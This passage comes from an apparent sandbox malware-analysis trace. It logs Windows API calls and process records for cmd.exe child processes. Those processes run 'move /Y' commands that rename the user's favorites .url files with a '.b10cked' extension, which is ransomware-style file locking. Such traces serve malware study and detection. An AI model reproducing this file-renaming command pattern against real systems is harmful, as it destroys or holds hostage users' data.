"c:\\users\\default\\favori~1\\msnweb~1\\msn entertainment.url"), lpNewFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Entertainment.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn entertainment.url.b10cked"), dwFlags=0x3) returned 1 [0215.145] FindClose (in: hFindFile=0x2b0ef0 | out: hFindFile=0x2b0ef0) returned 1 [0215.145] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x14ed40 | out: _Buffer=" 1") returned 9 [0215.145] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.145] GetFileType (hFile=0x7) returned 0x2 [0215.239] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0215.239] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14eccc | out: lpMode=0x14eccc) returned 1 [0215.239] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.239] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ed00 | out: lpConsoleScreenBufferInfo=0x14ed00) returned 1 [0215.239] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0215.240] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x14ed40 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0215.240] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x14ed24, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x14ed24*=0x1a) returned 1 [0215.240] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.240] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0215.240] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.240] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0215.240] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.240] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0215.241] SetConsoleInputExeNameW () returned 0x1 [0215.241] GetConsoleOutputCP () returned 0x1b5 [0215.241] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.241] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.241] exit (_Code=0) Process: id = "536" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16720" os_pid = "0x638" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNMON~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Money.url.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31762 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31763 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31764 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31765 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 31766 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31767 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31768 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31769 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31770 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 31771 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31878 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31879 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31880 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31881 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 31882 start_va = 0x580000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 31883 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31884 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31885 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31886 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31887 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31888 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31889 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31890 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31891 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31892 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 31893 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31894 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31895 start_va = 0x290000 end_va = 0x296fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 31896 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 31897 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 31898 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 31899 start_va = 0x590000 end_va = 0x690fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 31900 start_va = 0x6a0000 end_va = 0x129ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 31901 start_va = 0x12a0000 end_va = 0x1402fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012a0000" filename = "" Thread: id = 737 os_tid = 0xb98 [0215.419] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fe9c | out: lpSystemTimeAsFileTime=0x28fe9c*(dwLowDateTime=0xb533caa0, dwHighDateTime=0x1d440a9)) [0215.419] GetCurrentProcessId () returned 0x638 [0215.419] GetCurrentThreadId () returned 0xb98 [0215.419] GetTickCount () returned 0x3c4c4 [0215.419] QueryPerformanceCounter (in: lpPerformanceCount=0x28fe94 | out: lpPerformanceCount=0x28fe94*=27220793393) returned 1 [0215.419] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0215.420] __set_app_type (_Type=0x1) [0215.420] __p__fmode () returned 0x76b331f4 [0215.420] __p__commode () returned 0x76b331fc [0215.420] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0215.420] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0215.420] GetCurrentThreadId () returned 0xb98 [0215.420] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb98) returned 0x38 [0215.420] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0215.420] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0215.420] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.421] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0215.421] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28fe2c | out: phkResult=0x28fe2c*=0x0) returned 0x2 [0215.421] VirtualQuery (in: lpAddress=0x28fe63, lpBuffer=0x28fdfc, dwLength=0x1c | out: lpBuffer=0x28fdfc*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0215.421] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28fdfc, dwLength=0x1c | out: lpBuffer=0x28fdfc*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0215.421] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28fdfc, dwLength=0x1c | out: lpBuffer=0x28fdfc*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0215.421] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28fdfc, dwLength=0x1c | out: lpBuffer=0x28fdfc*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0215.422] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28fdfc, dwLength=0x1c | out: lpBuffer=0x28fdfc*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x7000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0215.422] GetConsoleOutputCP () returned 0x1b5 [0215.422] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.422] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0215.422] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.422] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0215.422] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.422] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0215.422] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.422] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0215.423] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.423] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0215.423] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.423] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0215.423] GetEnvironmentStringsW () returned 0x390198* [0215.423] FreeEnvironmentStringsW (penv=0x390198) returned 1 [0215.423] GetEnvironmentStringsW () returned 0x390198* [0215.424] FreeEnvironmentStringsW (penv=0x390198) returned 1 [0215.424] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28ed9c | out: phkResult=0x28ed9c*=0x40) returned 0x0 [0215.424] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x0, lpData=0x28eda8*=0xc0, lpcbData=0x28eda0*=0x1000) returned 0x2 [0215.424] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x4, lpData=0x28eda8*=0x1, lpcbData=0x28eda0*=0x4) returned 0x0 [0215.424] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x0, lpData=0x28eda8*=0x1, lpcbData=0x28eda0*=0x1000) returned 0x2 [0215.424] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x4, lpData=0x28eda8*=0x0, lpcbData=0x28eda0*=0x4) returned 0x0 [0215.424] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x4, lpData=0x28eda8*=0x40, lpcbData=0x28eda0*=0x4) returned 0x0 [0215.424] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x4, lpData=0x28eda8*=0x40, lpcbData=0x28eda0*=0x4) returned 0x0 [0215.424] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x0, lpData=0x28eda8*=0x40, lpcbData=0x28eda0*=0x1000) returned 0x2 [0215.424] RegCloseKey (hKey=0x40) returned 0x0 [0215.424] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28ed9c | out: phkResult=0x28ed9c*=0x40) returned 0x0 [0215.424] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x0, lpData=0x28eda8*=0x40, lpcbData=0x28eda0*=0x1000) returned 0x2 [0215.424] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x4, lpData=0x28eda8*=0x1, lpcbData=0x28eda0*=0x4) returned 0x0 [0215.424] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x0, lpData=0x28eda8*=0x1, lpcbData=0x28eda0*=0x1000) returned 0x2 [0215.424] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x4, lpData=0x28eda8*=0x0, lpcbData=0x28eda0*=0x4) returned 0x0 [0215.424] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x4, lpData=0x28eda8*=0x9, lpcbData=0x28eda0*=0x4) returned 0x0 [0215.424] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x4, lpData=0x28eda8*=0x9, lpcbData=0x28eda0*=0x4) returned 0x0 [0215.424] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x0, lpData=0x28eda8*=0x9, lpcbData=0x28eda0*=0x1000) returned 0x2 [0215.424] RegCloseKey (hKey=0x40) returned 0x0 [0215.424] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b1 [0215.425] srand (_Seed=0x5b8863b1) [0215.425] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNMON~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Money.url.b10cked\"" [0215.425] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNMON~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Money.url.b10cked\"" [0215.425] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.425] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3918f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0215.425] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0215.425] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0215.425] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0215.425] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0215.426] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0215.426] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0215.426] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0215.426] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0215.426] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0215.426] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0215.426] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0215.426] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0215.426] GetEnvironmentStringsW () returned 0x3922e8* [0215.426] FreeEnvironmentStringsW (penv=0x3922e8) returned 1 [0215.426] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.426] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0215.426] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0215.426] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0215.426] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0215.426] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0215.426] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0215.426] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0215.426] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0215.426] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0215.426] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28fb68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.426] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28fb68, lpFilePart=0x28fb64 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28fb64*="Desktop") returned 0x18 [0215.427] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0215.427] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f8e4 | out: lpFindFileData=0x28f8e4) returned 0x390028 [0215.427] FindClose (in: hFindFile=0x390028 | out: hFindFile=0x390028) returned 1 [0215.427] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f8e4 | out: lpFindFileData=0x28f8e4) returned 0x390028 [0215.427] FindClose (in: hFindFile=0x390028 | out: hFindFile=0x390028) returned 1 [0215.427] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f8e4 | out: lpFindFileData=0x28f8e4) returned 0x390028 [0215.427] FindClose (in: hFindFile=0x390028 | out: hFindFile=0x390028) returned 1 [0215.427] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0215.428] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0215.428] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0215.428] GetEnvironmentStringsW () returned 0x392b08* [0215.428] FreeEnvironmentStringsW (penv=0x392b08) returned 1 [0215.428] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.428] GetConsoleOutputCP () returned 0x1b5 [0215.429] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.429] GetUserDefaultLCID () returned 0x409 [0215.429] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0215.429] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28fca8, cchData=128 | out: lpLCData="0") returned 2 [0215.429] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28fca8, cchData=128 | out: lpLCData="0") returned 2 [0215.429] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28fca8, cchData=128 | out: lpLCData="1") returned 2 [0215.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0215.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0215.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0215.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0215.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0215.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0215.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0215.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0215.430] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0215.430] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0215.430] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0215.431] GetConsoleTitleW (in: lpConsoleTitle=0x3808f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.431] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0215.431] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0215.432] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0215.432] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0215.433] _wcsicmp (_String1="move", _String2=")") returned 68 [0215.433] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0215.433] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0215.433] _wcsicmp (_String1="IF", _String2="move") returned -4 [0215.433] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0215.433] _wcsicmp (_String1="REM", _String2="move") returned 5 [0215.433] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0215.436] GetConsoleTitleW (in: lpConsoleTitle=0x28f9a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.583] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0215.583] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0215.583] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0215.583] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0215.583] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0215.583] _wcsicmp (_String1="move", _String2="CD") returned 10 [0215.583] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0215.583] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0215.583] _wcsicmp (_String1="move", _String2="REN") returned -5 [0215.583] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0215.583] _wcsicmp (_String1="move", _String2="SET") returned -6 [0215.583] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0215.583] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0215.583] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0215.583] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0215.583] _wcsicmp (_String1="move", _String2="MD") returned 11 [0215.583] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0215.583] _wcsicmp (_String1="move", _String2="RD") returned -5 [0215.583] _wcsicmp 